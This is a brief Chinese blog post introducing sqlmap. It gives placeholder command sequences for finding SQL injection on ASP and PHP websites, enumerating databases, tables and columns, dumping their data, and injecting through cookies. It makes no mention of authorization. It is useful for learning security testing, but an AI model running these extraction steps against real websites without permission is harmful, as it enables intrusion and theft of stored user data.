SQLMAP介绍

Author Avatar
kabeor 3月 31, 2019

ASP网站渗透

常用: 明小子,啊D,NBSI,御剑

asp网站常用access(文件数据库)

sqlmap -u "网站"
-u检测是否存在注入漏洞,返回数据库名
sqlmap -u "网站" --tables
-tables猜解所有表名

找到用户表

sqlmap -u "网站" --columns -T "表名"
–columns根据表猜解列名

sqlmap -u "网站" --dump -C "列名" -T "表名"
–dump下载数据

PHP网站渗透

检测
sqlmap -u "网站"

sqlmap -u "网站" --is-dba

列出所有数据库
sqlmap -u "网站" -dbs

查找自己数据库
sqlmap -u "网站" --current-db

猜解所有表名,根据数据库查询
sqlmap -u "网站" --tables -D"数据库名"

sqlmap -u "网站" --columns -T "表名" -D "数据库名"

查询列的字段
sqlmap -u "网站" --dump -C "列名" -T "表名" -D "数据库名"

Cookie注入

sqlmap -u "网站" --cookie "id=参数" --level 2
cookie注入需要提升权限为2

猜解
sqlmap -u "网站" --tables --cookie "id=参数" --level 2

sqlmap -u "网站" --columns -T "表名" --cookie "id=参数" --level 2

sqlmap -u "网站" --dump -C "列名" -T "表名" --cookie "id=参数" --level 2

From https://kabeor.github.io/SQLMAP介绍/ bye

This blog is under a CC BY-NC-SA 4.0 Unported License
本文链接:https://kabeor.github.io/SQLMAP介绍/